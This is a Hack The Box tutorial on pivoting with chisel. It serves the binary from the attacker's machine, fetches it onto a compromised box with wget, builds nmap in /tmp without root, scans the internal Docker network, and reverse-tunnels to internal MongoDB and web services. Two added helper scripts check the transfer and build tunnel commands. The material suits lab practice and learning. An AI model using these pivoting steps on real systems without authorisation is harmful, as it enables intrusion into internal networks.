Learn chisel!

Hack The Box

Having fun with Hack the Box?

When working on HTB boxes, port forwarding is needed in some cases: a service is reachable only from the box itself (a Docker container, for example), not from your own machine.

So understanding chisel can be very handy.

Here I will show you how to use chisel, based on my experiences with Hack the Box.

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP

Install chisel on your local & attacking machine (the box)

I only tried it on Kali Linux. It's very simple and easy.

chisel | Kali Linux Tools (on Kali: sudo apt install chisel)

Or you can follow the instructions on https://github.com/jpillora/chisel

When installed, you have a single executable file, chisel.

As long as you have this file, you can run chisel. It is a single Go binary with no dependencies. One caveat: it has to match the CPU architecture of the box (check with "uname -m" there); if the box is not the same architecture as your local machine, download the matching release from the GitHub page instead of copying your local binary.

So, how to install chisel on the attacking machine (the box)?

Copy that file over.

Start an HTTP server in the directory where chisel exists (on your local machine):

┌──(kali㉿kali)-[~/workplace]
└─$ ls
chisel  

┌──(kali㉿kali)-[~/workplace]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

On the attacking machine (the box), use wget to fetch chisel.

10.10.14.3 is the local machine (your VPN address).

www-data@box_machine:/var/www/html/$ wget http://10.10.14.3:8888/chisel
--2022-09-09 09:09:09--  http://10.10.14.3:8888/chisel
Connecting to 10.10.14.3:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length:999 [application/octet-stream]
Saving to: 'chisel'

     0K                                                       100%  999K=0s

2022-09-09 09:09:09 (999 KB/s) - 'chisel' saved [999/999]

Back on the local machine, the HTTP server logs the download (10.10.11.167 is the box). Stop the server once the transfer is done: it serves that directory to anyone who can reach port 8888.

┌──(kali㉿kali)-[~/workplace]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.11.167 - - [09/Sep/2022 09:09:09] "GET /chisel HTTP/1.1" 200 -

Check that the saved size ('chisel' saved [999/999] above) matches the file on your local machine, so you know the download was not cut off. Then don't forget to give permission to execute; wget saves the file without the execute bit.

chmod 700 chisel
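As an added example (not from the original post), here is a small POSIX shell helper for the transfer step. It checks that the copied binary is byte-for-byte what you served (size and SHA-256) before making it executable, which catches a cut-off download before you start debugging chisel. The function names sha256_of, verify_transfer and demo_transfer are chosen here, and the demo stands in for the wget copy with a constructed file so it runs offline.

```shell
#!/bin/sh
# Added example, not part of the original post or of chisel.
# Usage on the box, after wget:  verify_transfer ./chisel <sha256 from local> <size from local>
# On the local machine, get the values with:  sha256sum chisel; wc -c chisel

# sha256_of FILE: print the SHA-256 of FILE with whichever tool the host has
# (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_transfer FILE EXPECTED_SHA256 [EXPECTED_SIZE]
# Returns 0 only if the hash (and, when given, the byte size) match; on success
# it also runs "chmod 700", like the post does after wget.
verify_transfer() {
  file=$1; want=$2; size=${3:-}
  [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
  if [ -n "$size" ]; then
    have_size=$(wc -c < "$file" | tr -d ' ')
    [ "$have_size" -eq "$size" ] || { echo "size mismatch: $have_size != $size" >&2; return 1; }
  fi
  have=$(sha256_of "$file")
  [ "$have" = "$want" ] || { echo "sha256 mismatch" >&2; return 1; }
  chmod 700 "$file"
}

# demo_transfer: offline simulation with a constructed "binary". Returns 0 when
# a faithful copy verifies and a truncated copy is rejected.
demo_transfer() {
  dir=$(mktemp -d)
  printf 'not really chisel\n' > "$dir/chisel.orig"        # constructed stand-in
  orig_sum=$(sha256_of "$dir/chisel.orig")
  orig_size=$(wc -c < "$dir/chisel.orig" | tr -d ' ')
  cp "$dir/chisel.orig" "$dir/chisel"                      # stands in for wget
  verify_transfer "$dir/chisel" "$orig_sum" "$orig_size" || return 1
  head -c 5 "$dir/chisel.orig" > "$dir/chisel"             # simulate a cut-off download
  if verify_transfer "$dir/chisel" "$orig_sum" "$orig_size" 2>/dev/null; then return 1; fi
  rm -rf "$dir"
  return 0
}

demo_transfer && echo "transfer check works"
```

Pass the hash and size you computed locally as arguments; never trust values printed on the box, since that is the side you are trying to verify.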

Running nmap on the attacking machine

When Docker containers are running on the box, you want to run nmap from the box itself.

Then you will find some open ports that are not reachable from your local machine.

Here's how to install nmap on the attacking machine (Linux) when you don't have root permission.

  1. Get the nmap source from https://nmap.org/download.html . In my case nmap-7.93.tar.bz2 was the "Latest stable Nmap release tarball". Download it to your local machine.
  2. Send it to the attacking machine, like we did with chisel.
  3. I copied it to /tmp, since the user I was using (www-data) did not have a home directory. /tmp was the only safe directory that user could write to.
  4. Configure and install. "--prefix=/tmp" is needed because of the user's limited permissions: by default nmap installs under /usr/local, which fails when you are not root. This step also needs a C compiler and make on the box (check with "which gcc make" first); without them configure or make will fail, and you need a prebuilt nmap binary instead.
bzip2 -cd nmap-7.93.tar.bz2 | tar xvf -
cd nmap-7.93
./configure --prefix=/tmp
make
make install

Then we have /tmp/bin/nmap.

Use it like regular nmap. Without root it can only do a TCP connect scan (no SYN scan), which is why the results below say "conn-refused" for closed ports. 172.17.0.0/24 is the default Docker bridge network.

/tmp/bin/nmap -p 0-34000 172.17.0.0/24

Setting up port forwarding with chisel

Let's assume that nmap found some open ports.

The first one is as below.

Nmap scan report for 172.17.0.4
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT      STATE SERVICE
27017/tcp open  mongod

On your local machine, start the chisel server:

┌──(kali㉿kali)-[~/workplace]
└─$ ./chisel server -p 7777 --reverse

Port 7777 can be something else, as long as it's not used by another process. "--reverse" is required: without it the server rejects the R: remotes used below. Note that the server accepts any client that can reach port 7777, so on a shared VPN add "--auth user:pass" to both the server and the client command.

On the attacking machine (the box):

 ./chisel client 10.10.14.3:7777 R:127.0.0.1:3000:172.17.0.4:27017

Read the remote as "R:<where the server listens>:<target as seen from the box>": the server listens on 127.0.0.1:3000 on your local machine, and every connection to it is tunnelled through the client and delivered to 172.17.0.4:27017. So from the local machine, open a new terminal and connect to 127.0.0.1:3000 to reach "172.17.0.4:27017":

┌──(kali㉿kali)-[~/workplace]
└─$ mongo --host 127.0.0.1:3000
MongoDB shell version v5.3.1
connecting to: mongodb://127.0.0.1:3000/?compressors=disabled&gssapiServiceName=mongodb
 ~~
> show databases;
admin    0.000GB
config   0.000GB
local    0.000GB

Here is another sample.

Nmap scan report for 172.17.0.5
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp open  http

The server side is the same as above.

┌──(kali㉿kali)-[~/workplace]
└─$ ./chisel server -p 7777 --reverse

On the attacking machine (the box):

 ./chisel client 10.10.14.3:7777 R:127.0.0.1:3000:172.17.0.5:80

If the first chisel client is still running, kill it before starting the new one, since both bind local port 3000 on the server. The server itself can stay up. Alternatively, give the second remote a different local port (for example R:127.0.0.1:3001:172.17.0.5:80), or pass both remotes to a single client command.

Then on your local machine, open a web browser like Firefox and go to

http://127.0.0.1:3000

Then you can see the 172.17.0.5:80 website.
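As an added example (not from the original post and not part of chisel), the following shell script joins the two steps above: it turns the nmap output from the box into the R: remote specs chisel expects, one local port per open service, so all discovered services are forwarded by a single client command instead of killing and restarting the client per service. The nmap text is constructed from the two reports above; the function names nmap_to_remotes and chisel_client_cmd, the server address and the first local port are choices made here.

```shell
#!/bin/sh
# Added example, not part of the original post or of chisel itself.
# Turns nmap output gathered on the box into chisel reverse-remote specs so
# that every discovered service gets its own local port in ONE client command.

# Constructed sample: the two nmap reports from the post, as nmap prints them.
SAMPLE_NMAP='Nmap scan report for 172.17.0.4
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT      STATE SERVICE
27017/tcp open  mongod

Nmap scan report for 172.17.0.5
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
'

# nmap_to_remotes [FIRST_LOCAL_PORT]
# Reads nmap normal output on stdin and prints one
# "R:127.0.0.1:<local>:<host>:<port>" line per open TCP port, handing out
# consecutive local ports from FIRST_LOCAL_PORT (default 3000). Binding to
# 127.0.0.1 keeps the forwarded services off your VPN interface.
nmap_to_remotes() {
  awk -v port="${1:-3000}" '
    /^Nmap scan report for / {        # "for 172.17.0.4" or "for name (172.17.0.4)"
      host = $NF; gsub(/[()]/, "", host)
    }
    /^[0-9]+\/tcp +open/ {            # e.g. "27017/tcp open  mongod"
      split($1, a, "/")
      printf "R:127.0.0.1:%d:%s:%s\n", port, host, a[1]
      port++
    }'
}

# chisel_client_cmd SERVER_HOST:PORT [FIRST_LOCAL_PORT]
# Builds the full client command line to paste on the box. SERVER_HOST:PORT is
# your local VPN address plus the port given to "chisel server -p".
chisel_client_cmd() {
  printf './chisel client %s' "$1"
  nmap_to_remotes "${2:-3000}" | while IFS= read -r remote; do
    printf ' %s' "$remote"
  done
  printf '\n'
}

# Demo on the constructed sample.
printf '%s' "$SAMPLE_NMAP" | chisel_client_cmd 10.10.14.3:7777 3000
```

In real use, pipe the saved scan in instead of the sample ("chisel_client_cmd 10.10.14.3:7777 < scan.txt"); the server still needs "--reverse", and local ports 3000, 3001, ... then map to the services in the order nmap listed them.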

Fin